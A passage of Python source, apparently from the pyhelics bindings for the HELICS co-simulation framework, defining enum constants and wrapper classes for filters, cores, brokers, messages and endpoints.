HELICS_ERROR_OTHER = HelicsError.OTHER
HELICS_ERROR_USER_ABORT = HelicsError.USER_ABORT
HELICS_ERROR_INSUFFICIENT_SPACE = HelicsError.INSUFFICIENT_SPACE
HELICS_ERROR_EXECUTION_FAILURE = HelicsError.EXECUTION_FAILURE
HELICS_ERROR_INVALID_FUNCTION_CALL = HelicsError.INVALID_FUNCTION_CALL
HELICS_ERROR_INVALID_STATE_TRANSITION = HelicsError.INVALID_STATE_TRANSITION
HELICS_WARNING = HelicsError.WARNING
HELICS_ERROR_SYSTEM_FAILURE = HelicsError.SYSTEM_FAILURE
HELICS_ERROR_DISCARD = HelicsError.DISCARD
HELICS_ERROR_INVALID_ARGUMENT = HelicsError.INVALID_ARGUMENT
HELICS_ERROR_INVALID_OBJECT = HelicsError.INVALID_OBJECT
HELICS_ERROR_CONNECTION_FAILURE = HelicsError.CONNECTION_FAILURE
HELICS_ERROR_REGISTRATION_FAILURE = HelicsError.REGISTRATION_FAILURE
HELICS_OK = HelicsError.OK
helics_error_fatal = HelicsError.FATAL
helics_error_external_type = HelicsError.EXTERNAL_TYPE
helics_error_other = HelicsError.OTHER
helics_error_user_abort = HelicsError.USER_ABORT
helics_error_insufficient_space = HelicsError.INSUFFICIENT_SPACE
helics_error_execution_failure = HelicsError.EXECUTION_FAILURE
helics_error_invalid_function_call = HelicsError.INVALID_FUNCTION_CALL
helics_error_invalid_state_transition = HelicsError.INVALID_STATE_TRANSITION
helics_warning = HelicsError.WARNING
helics_error_system_failure = HelicsError.SYSTEM_FAILURE
helics_error_discard = HelicsError.DISCARD
helics_error_invalid_argument = HelicsError.INVALID_ARGUMENT
helics_error_invalid_object = HelicsError.INVALID_OBJECT
helics_error_connection_failure = HelicsError.CONNECTION_FAILURE
helics_error_registration_failure = HelicsError.REGISTRATION_FAILURE
helics_ok = HelicsError.OK
@unique
class HelicsProperty(IntEnum):
"""
- **TIME_DELTA**
- **TIME_PERIOD**
- **TIME_OFFSET**
- **TIME_RT_LAG**
- **TIME_RT_LEAD**
- **TIME_RT_TOLERANCE**
- **TIME_INPUT_DELAY**
- **TIME_OUTPUT_DELAY**
- **INT_MAX_ITERATIONS**
- **INT_LOG_LEVEL**
- **INT_FILE_LOG_LEVEL**
- **INT_CONSOLE_LOG_LEVEL**
"""
TIME_DELTA = 137 # HelicsProperties
TIME_PERIOD = 140 # HelicsProperties
TIME_OFFSET = 141 # HelicsProperties
TIME_RT_LAG = 143 # HelicsProperties
TIME_RT_LEAD = 144 # HelicsProperties
TIME_RT_TOLERANCE = 145 # HelicsProperties
TIME_INPUT_DELAY = 148 # HelicsProperties
TIME_OUTPUT_DELAY = 150 # HelicsProperties
INT_MAX_ITERATIONS = 259 # HelicsProperties
INT_LOG_LEVEL = 271 # HelicsProperties
INT_FILE_LOG_LEVEL = 272 # HelicsProperties
INT_CONSOLE_LOG_LEVEL = 274 # HelicsProperties
HELICS_INVALID_OPTION_INDEX = -101
HELICS_INVALID_PROPERTY_VALUE = -972
HELICS_PROPERTY_TIME_DELTA = HelicsProperty.TIME_DELTA
HELICS_PROPERTY_TIME_PERIOD = HelicsProperty.TIME_PERIOD
HELICS_PROPERTY_TIME_OFFSET = HelicsProperty.TIME_OFFSET
HELICS_PROPERTY_TIME_RT_LAG = HelicsProperty.TIME_RT_LAG
HELICS_PROPERTY_TIME_RT_LEAD = HelicsProperty.TIME_RT_LEAD
HELICS_PROPERTY_TIME_RT_TOLERANCE = HelicsProperty.TIME_RT_TOLERANCE
HELICS_PROPERTY_TIME_INPUT_DELAY = HelicsProperty.TIME_INPUT_DELAY
HELICS_PROPERTY_TIME_OUTPUT_DELAY = HelicsProperty.TIME_OUTPUT_DELAY
HELICS_PROPERTY_INT_MAX_ITERATIONS = HelicsProperty.INT_MAX_ITERATIONS
HELICS_PROPERTY_INT_LOG_LEVEL = HelicsProperty.INT_LOG_LEVEL
HELICS_PROPERTY_INT_FILE_LOG_LEVEL = HelicsProperty.INT_FILE_LOG_LEVEL
HELICS_PROPERTY_INT_CONSOLE_LOG_LEVEL = HelicsProperty.INT_CONSOLE_LOG_LEVEL
helics_property_time_delta = HelicsProperty.TIME_DELTA
helics_property_time_period = HelicsProperty.TIME_PERIOD
helics_property_time_offset = HelicsProperty.TIME_OFFSET
helics_property_time_rt_lag = HelicsProperty.TIME_RT_LAG
helics_property_time_rt_lead = HelicsProperty.TIME_RT_LEAD
helics_property_time_rt_tolerance = HelicsProperty.TIME_RT_TOLERANCE
helics_property_time_input_delay = HelicsProperty.TIME_INPUT_DELAY
helics_property_time_output_delay = HelicsProperty.TIME_OUTPUT_DELAY
helics_property_int_max_iterations = HelicsProperty.INT_MAX_ITERATIONS
helics_property_int_log_level = HelicsProperty.INT_LOG_LEVEL
helics_property_int_file_log_level = HelicsProperty.INT_FILE_LOG_LEVEL
helics_property_int_console_log_level = HelicsProperty.INT_CONSOLE_LOG_LEVEL
@unique
class HelicsMultiInputMode(IntEnum):
"""
- **NO_OP**
- **VECTORIZE_OPERATION**
- **AND_OPERATION**
- **OR_OPERATION**
- **SUM_OPERATION**
- **DIFF_OPERATION**
- **MAX_OPERATION**
- **MIN_OPERATION**
- **AVERAGE_OPERATION**
"""
NO_OP = 0 # HelicsMultiInputMode
VECTORIZE_OPERATION = 1 # HelicsMultiInputMode
AND_OPERATION = 2 # HelicsMultiInputMode
OR_OPERATION = 3 # HelicsMultiInputMode
SUM_OPERATION = 4 # HelicsMultiInputMode
DIFF_OPERATION = 5 # HelicsMultiInputMode
MAX_OPERATION = 6 # HelicsMultiInputMode
MIN_OPERATION = 7 # HelicsMultiInputMode
AVERAGE_OPERATION = 8 # HelicsMultiInputMode
HELICS_MULTI_INPUT_NO_OP = HelicsMultiInputMode.NO_OP
HELICS_MULTI_INPUT_VECTORIZE_OPERATION = HelicsMultiInputMode.VECTORIZE_OPERATION
HELICS_MULTI_INPUT_AND_OPERATION = HelicsMultiInputMode.AND_OPERATION
HELICS_MULTI_INPUT_OR_OPERATION = HelicsMultiInputMode.OR_OPERATION
HELICS_MULTI_INPUT_SUM_OPERATION = HelicsMultiInputMode.SUM_OPERATION
HELICS_MULTI_INPUT_DIFF_OPERATION = HelicsMultiInputMode.DIFF_OPERATION
HELICS_MULTI_INPUT_MAX_OPERATION = HelicsMultiInputMode.MAX_OPERATION
HELICS_MULTI_INPUT_MIN_OPERATION = HelicsMultiInputMode.MIN_OPERATION
HELICS_MULTI_INPUT_AVERAGE_OPERATION = HelicsMultiInputMode.AVERAGE_OPERATION
helics_multi_input_no_op = HelicsMultiInputMode.NO_OP
helics_multi_input_vectorize_operation = HelicsMultiInputMode.VECTORIZE_OPERATION
helics_multi_input_and_operation = HelicsMultiInputMode.AND_OPERATION
helics_multi_input_or_operation = HelicsMultiInputMode.OR_OPERATION
helics_multi_input_sum_operation = HelicsMultiInputMode.SUM_OPERATION
helics_multi_input_diff_operation = HelicsMultiInputMode.DIFF_OPERATION
helics_multi_input_max_operation = HelicsMultiInputMode.MAX_OPERATION
helics_multi_input_min_operation = HelicsMultiInputMode.MIN_OPERATION
helics_multi_input_average_operation = HelicsMultiInputMode.AVERAGE_OPERATION
@unique
class HelicsHandleOption(IntEnum):
"""
- **CONNECTION_REQUIRED**
- **CONNECTION_OPTIONAL**
- **SINGLE_CONNECTION_ONLY**
- **MULTIPLE_CONNECTIONS_ALLOWED**
- **BUFFER_DATA**
- **STRICT_TYPE_CHECKING**
- **IGNORE_UNIT_MISMATCH**
- **ONLY_TRANSMIT_ON_CHANGE**
- **ONLY_UPDATE_ON_CHANGE**
- **IGNORE_INTERRUPTS**
- **MULTI_INPUT_HANDLING_METHOD**
- **INPUT_PRIORITY_LOCATION**
- **CLEAR_PRIORITY_LIST**
- **CONNECTIONS**
"""
CONNECTION_REQUIRED = 397 # HelicsHandleOptions
CONNECTION_OPTIONAL = 402 # HelicsHandleOptions
SINGLE_CONNECTION_ONLY = 407 # HelicsHandleOptions
MULTIPLE_CONNECTIONS_ALLOWED = 409 # HelicsHandleOptions
BUFFER_DATA = 411 # HelicsHandleOptions
STRICT_TYPE_CHECKING = 414 # HelicsHandleOptions
IGNORE_UNIT_MISMATCH = 447 # HelicsHandleOptions
ONLY_TRANSMIT_ON_CHANGE = 452 # HelicsHandleOptions
ONLY_UPDATE_ON_CHANGE = 454 # HelicsHandleOptions
IGNORE_INTERRUPTS = 475 # HelicsHandleOptions
MULTI_INPUT_HANDLING_METHOD = 507 # HelicsHandleOptions
INPUT_PRIORITY_LOCATION = 510 # HelicsHandleOptions
CLEAR_PRIORITY_LIST = 512 # HelicsHandleOptions
CONNECTIONS = 522 # HelicsHandleOptions
HELICS_HANDLE_OPTION_CONNECTION_REQUIRED = HelicsHandleOption.CONNECTION_REQUIRED
HELICS_HANDLE_OPTION_CONNECTION_OPTIONAL = HelicsHandleOption.CONNECTION_OPTIONAL
HELICS_HANDLE_OPTION_SINGLE_CONNECTION_ONLY = HelicsHandleOption.SINGLE_CONNECTION_ONLY
HELICS_HANDLE_OPTION_MULTIPLE_CONNECTIONS_ALLOWED = HelicsHandleOption.MULTIPLE_CONNECTIONS_ALLOWED
HELICS_HANDLE_OPTION_BUFFER_DATA = HelicsHandleOption.BUFFER_DATA
HELICS_HANDLE_OPTION_STRICT_TYPE_CHECKING = HelicsHandleOption.STRICT_TYPE_CHECKING
HELICS_HANDLE_OPTION_IGNORE_UNIT_MISMATCH = HelicsHandleOption.IGNORE_UNIT_MISMATCH
HELICS_HANDLE_OPTION_ONLY_TRANSMIT_ON_CHANGE = HelicsHandleOption.ONLY_TRANSMIT_ON_CHANGE
HELICS_HANDLE_OPTION_ONLY_UPDATE_ON_CHANGE = HelicsHandleOption.ONLY_UPDATE_ON_CHANGE
HELICS_HANDLE_OPTION_IGNORE_INTERRUPTS = HelicsHandleOption.IGNORE_INTERRUPTS
HELICS_HANDLE_OPTION_MULTI_INPUT_HANDLING_METHOD = HelicsHandleOption.MULTI_INPUT_HANDLING_METHOD
HELICS_HANDLE_OPTION_INPUT_PRIORITY_LOCATION = HelicsHandleOption.INPUT_PRIORITY_LOCATION
HELICS_HANDLE_OPTION_CLEAR_PRIORITY_LIST = HelicsHandleOption.CLEAR_PRIORITY_LIST
HELICS_HANDLE_OPTION_CONNECTIONS = HelicsHandleOption.CONNECTIONS
helics_handle_option_connection_required = HelicsHandleOption.CONNECTION_REQUIRED
helics_handle_option_connection_optional = HelicsHandleOption.CONNECTION_OPTIONAL
helics_handle_option_single_connection_only = HelicsHandleOption.SINGLE_CONNECTION_ONLY
helics_handle_option_multiple_connections_allowed = HelicsHandleOption.MULTIPLE_CONNECTIONS_ALLOWED
helics_handle_option_buffer_data = HelicsHandleOption.BUFFER_DATA
helics_handle_option_strict_type_checking = HelicsHandleOption.STRICT_TYPE_CHECKING
helics_handle_option_ignore_unit_mismatch = HelicsHandleOption.IGNORE_UNIT_MISMATCH
helics_handle_option_only_transmit_on_change = HelicsHandleOption.ONLY_TRANSMIT_ON_CHANGE
helics_handle_option_only_update_on_change = HelicsHandleOption.ONLY_UPDATE_ON_CHANGE
helics_handle_option_ignore_interrupts = HelicsHandleOption.IGNORE_INTERRUPTS
helics_handle_option_multi_input_handling_method = HelicsHandleOption.MULTI_INPUT_HANDLING_METHOD
helics_handle_option_input_priority_location = HelicsHandleOption.INPUT_PRIORITY_LOCATION
helics_handle_option_clear_priority_list = HelicsHandleOption.CLEAR_PRIORITY_LIST
helics_handle_option_connections = HelicsHandleOption.CONNECTIONS
@unique
class HelicsFilterType(IntEnum):
"""
- **CUSTOM**
- **DELAY**
- **RANDOM_DELAY**
- **RANDOM_DROP**
- **REROUTE**
- **CLONE**
- **FIREWALL**
"""
CUSTOM = 0 # HelicsFilterType
DELAY = 1 # HelicsFilterType
RANDOM_DELAY = 2 # HelicsFilterType
RANDOM_DROP = 3 # HelicsFilterType
REROUTE = 4 # HelicsFilterType
CLONE = 5 # HelicsFilterType
FIREWALL = 6 # HelicsFilterType
HELICS_FILTER_TYPE_CUSTOM = HelicsFilterType.CUSTOM
HELICS_FILTER_TYPE_DELAY = HelicsFilterType.DELAY
HELICS_FILTER_TYPE_RANDOM_DELAY = HelicsFilterType.RANDOM_DELAY
HELICS_FILTER_TYPE_RANDOM_DROP = HelicsFilterType.RANDOM_DROP
HELICS_FILTER_TYPE_REROUTE = HelicsFilterType.REROUTE
HELICS_FILTER_TYPE_CLONE = HelicsFilterType.CLONE
HELICS_FILTER_TYPE_FIREWALL = HelicsFilterType.FIREWALL
helics_filter_type_custom = HelicsFilterType.CUSTOM
helics_filter_type_delay = HelicsFilterType.DELAY
helics_filter_type_random_delay = HelicsFilterType.RANDOM_DELAY
helics_filter_type_random_drop = HelicsFilterType.RANDOM_DROP
helics_filter_type_reroute = HelicsFilterType.REROUTE
helics_filter_type_clone = HelicsFilterType.CLONE
helics_filter_type_firewall = HelicsFilterType.FIREWALL
@unique
class HelicsIterationRequest(IntEnum):
"""
- **NO_ITERATION**
- **FORCE_ITERATION**
- **ITERATE_IF_NEEDED**
"""
NO_ITERATION = 0 # HelicsIterationRequest
FORCE_ITERATION = 1 # HelicsIterationRequest
ITERATE_IF_NEEDED = 2 # HelicsIterationRequest
HELICS_ITERATION_REQUEST_NO_ITERATION = HelicsIterationRequest.NO_ITERATION
HELICS_ITERATION_REQUEST_FORCE_ITERATION = HelicsIterationRequest.FORCE_ITERATION
HELICS_ITERATION_REQUEST_ITERATE_IF_NEEDED = HelicsIterationRequest.ITERATE_IF_NEEDED
helics_iteration_request_no_iteration = HelicsIterationRequest.NO_ITERATION
helics_iteration_request_force_iteration = HelicsIterationRequest.FORCE_ITERATION
helics_iteration_request_iterate_if_needed = HelicsIterationRequest.ITERATE_IF_NEEDED
@unique
class HelicsIterationResult(IntEnum):
"""
- **NEXT_STEP**
- **ERROR**
- **HALTED**
- **ITERATING**
"""
NEXT_STEP = 0 # HelicsIterationResult
ERROR = 1 # HelicsIterationResult
HALTED = 2 # HelicsIterationResult
ITERATING = 3 # HelicsIterationResult
HELICS_ITERATION_RESULT_NEXT_STEP = HelicsIterationResult.NEXT_STEP
HELICS_ITERATION_RESULT_ERROR = HelicsIterationResult.ERROR
HELICS_ITERATION_RESULT_HALTED = HelicsIterationResult.HALTED
HELICS_ITERATION_RESULT_ITERATING = HelicsIterationResult.ITERATING
helics_iteration_result_next_step = HelicsIterationResult.NEXT_STEP
helics_iteration_result_error = HelicsIterationResult.ERROR
helics_iteration_result_halted = HelicsIterationResult.HALTED
helics_iteration_result_iterating = HelicsIterationResult.ITERATING
@unique
class HelicsFederateState(IntEnum):
"""
- **STARTUP**
- **INITIALIZATION**
- **EXECUTION**
- **FINALIZE**
- **ERROR**
- **PENDING_INIT**
- **PENDING_EXEC**
- **PENDING_TIME**
- **PENDING_ITERATIVE_TIME**
- **PENDING_FINALIZE**
- **FINISHED**
"""
STARTUP = 0 # HelicsFederateState
INITIALIZATION = 1 # HelicsFederateState
EXECUTION = 2 # HelicsFederateState
FINALIZE = 3 # HelicsFederateState
ERROR = 4 # HelicsFederateState
PENDING_INIT = 5 # HelicsFederateState
PENDING_EXEC = 6 # HelicsFederateState
PENDING_TIME = 7 # HelicsFederateState
PENDING_ITERATIVE_TIME = 8 # HelicsFederateState
PENDING_FINALIZE = 9 # HelicsFederateState
FINISHED = 10 # HelicsFederateState
HELICS_STATE_STARTUP = HelicsFederateState.STARTUP
HELICS_STATE_INITIALIZATION = HelicsFederateState.INITIALIZATION
HELICS_STATE_EXECUTION = HelicsFederateState.EXECUTION
HELICS_STATE_FINALIZE = HelicsFederateState.FINALIZE
HELICS_STATE_ERROR = HelicsFederateState.ERROR
HELICS_STATE_PENDING_INIT = HelicsFederateState.PENDING_INIT
HELICS_STATE_PENDING_EXEC = HelicsFederateState.PENDING_EXEC
HELICS_STATE_PENDING_TIME = HelicsFederateState.PENDING_TIME
HELICS_STATE_PENDING_ITERATIVE_TIME = HelicsFederateState.PENDING_ITERATIVE_TIME
HELICS_STATE_PENDING_FINALIZE = HelicsFederateState.PENDING_FINALIZE
HELICS_STATE_FINISHED = HelicsFederateState.FINISHED
helics_state_startup = HelicsFederateState.STARTUP
helics_state_initialization = HelicsFederateState.INITIALIZATION
helics_state_execution = HelicsFederateState.EXECUTION
helics_state_finalize = HelicsFederateState.FINALIZE
helics_state_error = HelicsFederateState.ERROR
helics_state_pending_init = HelicsFederateState.PENDING_INIT
helics_state_pending_exec = HelicsFederateState.PENDING_EXEC
helics_state_pending_time = HelicsFederateState.PENDING_TIME
helics_state_pending_iterative_time = HelicsFederateState.PENDING_ITERATIVE_TIME
helics_state_pending_finalize = HelicsFederateState.PENDING_FINALIZE
helics_state_finished = HelicsFederateState.FINISHED
def generate_cleanup_callback(obj):
t = type(obj)
if isinstance(obj, HelicsFederate):
f = loadSym("helicsFederateFree")
elif isinstance(obj, HelicsFederateInfo):
f = loadSym("helicsFederateInfoFree")
elif isinstance(obj, HelicsBroker):
f = loadSym("helicsBrokerFree")
elif isinstance(obj, HelicsCore):
f = loadSym("helicsCoreFree")
elif isinstance(obj, HelicsQuery):
f = loadSym("helicsQueryFree")
elif isinstance(obj, HelicsMessage):
f = loadSym("helicsMessageFree")
else:
f = None
warnings.warn("Trying to finalize unknown object of type: {}".format(t))
def cleanup(handle):
if f is not None:
f(handle)
if PYHELICS_CLEANUP:
helicsCleanupLibrary()
return cleanup
class _HelicsCHandle(object):
def __init__(self, handle, cleanup=True):
self.handle = handle
if cleanup:
cleanup_callback = generate_cleanup_callback(self)
self._finalizer = weakref.finalize(self, cleanup_callback, self.handle)
class _FilterOptionAccessor(_HelicsCHandle):
def __getitem__(self, index):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsFilterGetOption(HelicsFilter(self.handle, cleanup=False), idx)
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsFilterSetOption(HelicsFilter(self.handle, cleanup=False), idx, value)
def __repr__(self):
lst = []
for o in HelicsHandleOption:
lst.append("'{}' = {}".format(o.name, self[o]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class HelicsFilter(_HelicsCHandle):
def __init__(self, handle, cleanup=True):
super(HelicsFilter, self).__init__(handle, cleanup=cleanup)
self.option = _FilterOptionAccessor(self.handle, cleanup=False)
def __repr__(self):
name = self.name
info = self.info
return """<helics.{class_name}(name = "{name}", info = "{info}") at {id}>""".format(
class_name=self.__class__.__name__, name=name, info=info, id=hex(id(self))
)
def add_destination_target(self, destination: str):
"""
Add a destination target to a cloning filter.
All messages going to a destination are copied to the delivery address(es).
"""
helicsFilterAddDestinationTarget(self, destination)
def add_source_target(self, source: str):
"""
Add a source target to a cloning filter.
All messages coming from a source are copied to the delivery address(es).
"""
helicsFilterAddSourceTarget(self, source)
def remove_destination_target(self, destination: str):
"""remove a destination target from a cloning filter."""
helicsFilterRemoveTarget(self, destination)
def add_delivery_endpoint(self, delivery_endpoint: str):
"""
Add a delivery destination from a filter.
**Parameters**
- **`delivery_endpoint`** - A string with the delivery endpoint to add.
"""
helicsFilterAddDeliveryEndpoint(self, delivery_endpoint)
def remove_delivery_endpoint(self, delivery_endpoint: str):
"""
Remove a delivery destination from a filter.
**Parameters**
- **`delivery_endpoint`** - A string with the delivery endpoint to remove.
"""
helicsFilterRemoveDeliveryEndpoint(self, delivery_endpoint)
@property
def name(self) -> str:
return helicsFilterGetName(self)
@property
def info(self) -> str:
"""Get the interface information field of the filter."""
return helicsFilterGetInfo(self)
@info.setter
def info(self, info: str):
"""Set the interface information field of the filter."""
helicsFilterSetInfo(self, info)
def set(self, property: str, value: float):
"""Set a property on a filter."""
helicsFilterSet(self, property, value)
class HelicsCloningFilter(HelicsFilter):
pass
class HelicsCore(_HelicsCHandle):
def __repr__(self):
identifier = self.identifier
address = self.address
return """<helics.{class_name}(identifier = "{identifier}", address = "{address}") at {id}>""".format(
class_name=self.__class__.__name__,
identifier=identifier,
address=address,
id=hex(id(self)),
)
@property
def identifier(self) -> str:
"""Get an identifier string for the core."""
return helicsCoreGetIdentifier(self)
@property
def address(self) -> str:
"""Get the connection network or connection address for the core."""
return helicsCoreGetAddress(self)
def is_valid(self) -> bool:
"""Check if the core is valid."""
return helicsCoreIsValid(self)
def is_connected(self) -> bool:
"""Check if the core is connected to the broker."""
return helicsCoreIsConnected(self)
def clone(self):
return helicsCoreClone(self)
def set_ready_to_init(self):
"""Set the core to ready to enter init.
This function only needs to be called for cores that don't have any federates but may have filters for cores with federates it won't do anything.
"""
helicsCoreSetReadyToInit(self)
def disconnect(self):
"""
Disconnect the core from its broker.
"""
helicsCoreDisconnect(self)
def wait_for_disconnect(self, ms_to_wait: int = -1) -> bool:
"""Waits in the current thread until the broker is disconnected
**Parameters**
**`ms_to_wait`**: the timeout to wait for disconnect (-1) implies no timeout
Returns: true if the disconnect was successful false if it timed out.
"""
return helicsCoreWaitForDisconnect(self, ms_to_wait)
def register_filter(self, kind: HelicsFilterType, name: str = "") -> HelicsFilter:
"""
Create a destination Filter on the specified federate.
Filters can be created through a federate or a core , linking through a federate allows
a few extra features of name matching to function on the federate interface but otherwise
equivalent behavior
**`kind`**: the type of filter to create
**`name`**: the name of the filter (can be NULL)
Returns: a `helics.HelicsFilter` object.
"""
return helicsCoreRegisterFilter(self, kind, name)
def register_cloning_filter(self, delivery_endpoint: str) -> HelicsCloningFilter:
"""
Create a cloning Filter on the specified federate.
Cloning filters copy a message and send it to multiple locations source and destination can be added through other functions
**Parameters**
**`delivery_endpoint`**: the specified endpoint to deliver the message
Returns: a `helics.HelicsFilter` object.
"""
return helicsCoreRegisterCloningFilter(self, delivery_endpoint)
def set_global(self, name: str, value: str):
"""
Set a global federation value.
**Parameters**
**`name`**: the name of the global value to set
**`value`**: actual value of the global variable
"""
helicsCoreSetGlobal(self, name, value)
def query(self, target: str, query: str) -> JSONType:
"""
Make a query of the core.
This call is blocking until the value is returned which may take some time depending
on the size of the federation and the specific string being queried
**`target`**: the target of the query can be "federation", "federate", "broker", "core", or a specific name of a federate, core, or broker
**`query`**: a string with the query, see other documentation for specific properties to query, can be defined by the federate
Returns: a string with the value requested. this is either going to be a vector of strings value
or a JSON string stored in the first element of the vector. The string "#invalid" is returned
if the query was not valid
"""
q = helicsCreateQuery(target, query)
result = helicsQueryCoreExecute(q, self)
helicsQueryFree(q)
return result
def global_error(self, error_code: int, error_string: str):
"""
Generate a global error to terminate the federation.
**Parameters**
- **`error_code`**: an error code to give to the error.
- **`error_string`**: a string message associated with the error.
"""
helicsCoreGlobalError(self, error_code, error_string)
class HelicsBroker(_HelicsCHandle):
def __repr__(self):
identifier = self.identifier
address = self.address
return """<helics.{class_name}(identifier = "{identifier}", address = "{address}") at {id}>""".format(
class_name=self.__class__.__name__,
identifier=identifier,
address=address,
id=hex(id(self)),
)
def is_connected(self):
"""Check if the broker is connected."""
return helicsBrokerIsConnected(self) is True
def wait_for_disconnect(self, ms_to_wait: int = -1):
"""
Waits in the current thread until the broker is disconnected.
**Parameters**
- **`ms_to_wait`**: the timeout to wait for disconnect (-1) implies no timeout
Returns: `True` if the disconnect was successful false if it timed out
"""
return helicsBrokerWaitForDisconnect(self, ms_to_wait)
def disconnect(self):
"""
Disconnect the broker from any other brokers and communications.
"""
return helicsBrokerDisconnect(self)
@property
def identifier(self):
"""
Get the local identification for the broker.
"""
return helicsBrokerGetIdentifier(self)
@property
def name(self):
"""
Get the local identification for the broker.
"""
return helicsBrokerGetIdentifier(self)
@property
def address(self):
"""
Get the connection address for the broker.
"""
return helicsBrokerGetAddress(self)
def set_global(self, name: str, value: str):
"""
Set a federation global value.
This overwrites any previous value for this name. globals can be queried with a target of "global" and query of the value to Query.
**Parameters**
- **`name`**: the name of the global to set.
- **`value`**: the value of the global.
"""
helicsBrokerSetGlobal(self, name, value)
def data_link(self, source: str, target: str):
"""
Create a data link between a named publication and a named input.
**Parameters**
- **`source`**: the name of the publication.
- **`target`**: the name of the input.
"""
helicsBrokerDataLink(self, source, target)
def add_source_filter_to_endpoint(self, filter: str, target: str):
"""
Create a filter connection between a named filter and a named endpoint for messages coming from that endpoint.
**Parameters**
**`filter`**: the name of the filter.
**`target`**: the name of the source target.
"""
helicsBrokerAddSourceFilterToEndpoint(self, filter, target)
def add_destination_filter_to_endpoint(self, filter: str, target: str):
"""
Create a filter connection between a named filter and a named endpoint for destination processing.
**Parameters**
- **`filter`**: the name of the filter.
- **`target`**: the name of the source target.
"""
helicsBrokerAddDestinationFilterToEndpoint(self, filter, target)
def query(self, target: str, query: str, mode: HelicsSequencingMode = HelicsSequencingMode.FAST) -> JSONType:
"""
Make a query of the broker.
This call is blocking until the value is returned which may take some time depending on the size of the federation and the specific string being queried.
**Parameters**
- **`target`**: the target of the query can be "federation", "federate", "broker", "core", or a specific name of a federate, core, or broker.
- **`query`**: a string with the query, see other documentation for specific properties to query, can be defined by the federate.
Returns: a string with the value requested. This is either going to be a vector of strings value or a JSON string stored in the first element of the vector. The string "#invalid" is returned if the query was not valid.
"""
q = helicsCreateQuery(target, query)
if mode != HelicsSequencingMode.FAST:
helicsQuerySetOrdering(q, mode)
result = helicsQueryBrokerExecute(q, self)
helicsQueryFree(q)
return result
def global_error(self, error_code: int, error_string: str):
"""
Generate a global error to terminate the federation.
**Parameters**
- **`error_code`**: an error code to give to the error.
- **`error_string`**: a string message associated with the error.
"""
helicsBrokerGlobalError(self, error_code, error_string)
class _MessageFlagAccessor(_HelicsCHandle):
def __getitem__(self, index):
return helicsMessageGetFlagOption(HelicsMessage(self.handle, cleanup=False), index)
def __setitem__(self, index: int, value: bool):
return helicsMessageSetFlagOption(HelicsMessage(self.handle, cleanup=False), index, value)
def __repr__(self):
lst = []
for f in range(1, 16):
lst.append("{} = {}".format(f, self[f]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class HelicsMessage(_HelicsCHandle):
def __init__(self, handle, cleanup=True):
super(HelicsMessage, self).__init__(handle, cleanup=cleanup)
self.flag = _MessageFlagAccessor(self.handle, cleanup=False)
def __repr__(self):
source = self.source
destination = self.destination
original_source = self.original_source
original_destination = self.original_destination
time = self.time
message_id = self.message_id
message = self.data
return """<helics.{class_name}(source = "{source}", destination = "{destination}", original_source = "{original_source}", original_destination = "{original_destination}", time = {time}, id = {message_id}, message = "{message}") at {id}>""".format(
class_name=self.__class__.__name__,
source=source,
destination=destination,
original_source=original_source,
original_destination=original_destination,
time=time,
message_id=message_id,
message=message,
id=hex(id(self)),
)
def append(self, data: bytes):
helicsMessageAppendData(self, data)
def is_valid(self) -> bool:
return helicsMessageIsValid(self)
@property
def source(self):
return helicsMessageGetSource(self)
@source.setter
def source(self, v):
return helicsMessageSetSource(self, v)
@property
def destination(self):
return helicsMessageGetDestination(self)
@destination.setter
def destination(self, v):
return helicsMessageSetDestination(self, v)
@property
def original_source(self):
return helicsMessageGetOriginalSource(self)
@original_source.setter
def original_source(self, v):
return helicsMessageSetOriginalSource(self, v)
@property
def original_dest(self):
warnings.warn("This is deprecated. Use `original_destination` instead.")
return self.original_destination
@original_dest.setter
def original_dest(self, v):
warnings.warn("This is deprecated. Use `original_destination` instead.")
self.original_destination = v
@property
def original_destination(self):
return helicsMessageGetOriginalDestination(self)
@original_destination.setter
def original_destination(self, v):
return helicsMessageSetOriginalDestination(self, v)
@property
def time(self):
return helicsMessageGetTime(self)
@time.setter
def time(self, v):
return helicsMessageSetTime(self, v)
@property
def data(self):
return helicsMessageGetString(self)
@data.setter
def data(self, v: str):
return helicsMessageSetString(self, v)
@property
def raw_data(self) -> bytes:
return helicsMessageGetBytes(self)
@raw_data.setter
def raw_data(self, v: bytes):
return helicsMessageSetData(self, v)
@property
def message_id(self):
return helicsMessageGetMessageID(self)
@message_id.setter
def message_id(self, v):
return helicsMessageSetMessageID(self, v)
class HelicsQuery(_HelicsCHandle):
pass
class HelicsEndpoint(_HelicsCHandle):
def __repr__(self):
name = self.name
type = self.type
info = self.info
is_valid = self.is_valid()
default_destination = self.default_destination
n_pending_messages = self.n_pending_messages
return """<helics.{class_name}(name = "{name}", type = "{type}", info = "{info}", is_valid = {is_valid}, default_destination = "{default_destination}", n_pending_messages = {n_pending_messages}) at {id}>""".format(
class_name=self.__class__.__name__,
name=name,
type=type,
info=info,
is_valid=is_valid,
default_destination=default_destination,
n_pending_messages=n_pending_messages,
id=hex(id(self)),
)
@property
def default_destination(self) -> str:
"""Get the default destination for an endpoint."""
return helicsEndpointGetDefaultDestination(self)
@default_destination.setter
def default_destination(self, destination: str):
"""set the default destination for an endpoint."""
helicsEndpointSetDefaultDestination(self, destination)
@property
def n_pending_messages(self) -> int:
"""Returns the number of pending receives for endpoint."""
return helicsEndpointPendingMessageCount(self)
@property
def name(self) -> str:
"""Get the name of the endpoint."""
return helicsEndpointGetName(self)
@property
def type(self) -> str:
"""Get the specified type of the endpoint."""
return helicsEndpointGetType(self)
@property
def info(self) -> str:
"""Get the interface information field of the filter."""
return helicsEndpointGetInfo(self)
@info.setter
def info(self, info: str):
"""Set the interface information field of the filter."""
helicsEndpointSetInfo(self, info)
def is_valid(self) -> bool:
"""Check if the input is valid."""
return helicsEndpointIsValid(self)
def has_message(self) -> bool:
"""Checks if endpoint has unread messages."""
return helicsEndpointHasMessage(self)
def get_message(self) -> HelicsMessage:
"""Get a packet from an endpoint."""
return helicsEndpointGetMessage(self)
def create_message(self) -> HelicsMessage:
"""Create a message object."""
return helicsEndpointCreateMessage(self)
